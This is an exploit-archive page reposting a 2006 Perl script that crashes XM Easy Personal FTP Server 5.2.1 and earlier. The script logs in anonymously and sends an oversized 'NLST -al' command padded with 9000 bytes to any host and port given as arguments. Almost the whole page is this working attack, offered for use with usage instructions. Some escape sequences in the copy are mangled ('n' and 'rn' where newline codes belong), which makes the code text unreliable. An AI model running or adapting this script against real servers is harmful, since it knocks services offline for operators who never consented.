XM Easy Personal FTP Server <= 5.2.1 Remote Denial of Service Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : XM Easy Personal FTP Server <= 5.2.1 Remote Denial of Service Exploit
# Published : 2006-11-04
# Author : boecke
# Previous Title : OpenLDAP 2.2.29 Remote Denial of Service Exploit (meta)
# Next Title : Essentia Web Server 2.15 (GET Request) Remote DoS Exploit

#!/usr/bin/perl
#
# *
# * Title: XM Easy Personal FTP Server <= 5.2.1 'NLST -al' Remote Denial of Service
# * Author: boecke
# * Discovery: boecke
# * Vulnerability Type: Remote Denial of Service
# * Risk: Low Risk (Requires valid
# * Software Affected: XM Easy Personal FTP Server <= 5.2.1
# * Greetings: henrik, str0ke!
# *
#

use IO::Socket;

$commandToSend = "NLST -al ";
$remoteUsername = "anonymous";
$remotePassword = "borat@kik.com";
$remotePort = $ARGV[1];

sub bannerExploit()
{
       print "n x XM Easy Personal FTP Server <= v5.2.1 Remote Denial of Servicen";
       print " x Author: boecken x Discovery: boecke (boecke [at] herzeleid [dot] net)nn";
}

if ( @ARGV < 2 )
{
       bannerExploit();

       print " * Usage: perl ftp.pl 192.168.0.1 21nn";

       exit;
}

if ($socket = IO::Socket::INET->new( PeerAddr => $ARGV[0], PeerPort => $remotePort, Proto => "TCP" ))
{
       bannerExploit();

       print " + Establishing connection at " . $ARGV[0] . ":" . $remotePort . "n";

       print $socket "USER " . $remoteUsername . "rn";

       print " * FTP Username: '" . $remoteUsername . "'n";

       sleep( 1 );

       print $socket "PASS " . $remotePassword . "rn";

       print " * FTP Password: '" . $remotePassword . "'n";

       print $socket $commandToSend . "A" x 9000 . "rn";

       sleep( 3 );

       print $socket "QUITrn";

       print " + Sent 9000 bytes of data to $ARGV[0]:$remotePortnn";
}
else
{
       bannerExploit();

       print " + Failed to establish connection to " . $ARGV[0] . ":" . $remotePort . "n";

}

# www.Syue.com [2006-11-04]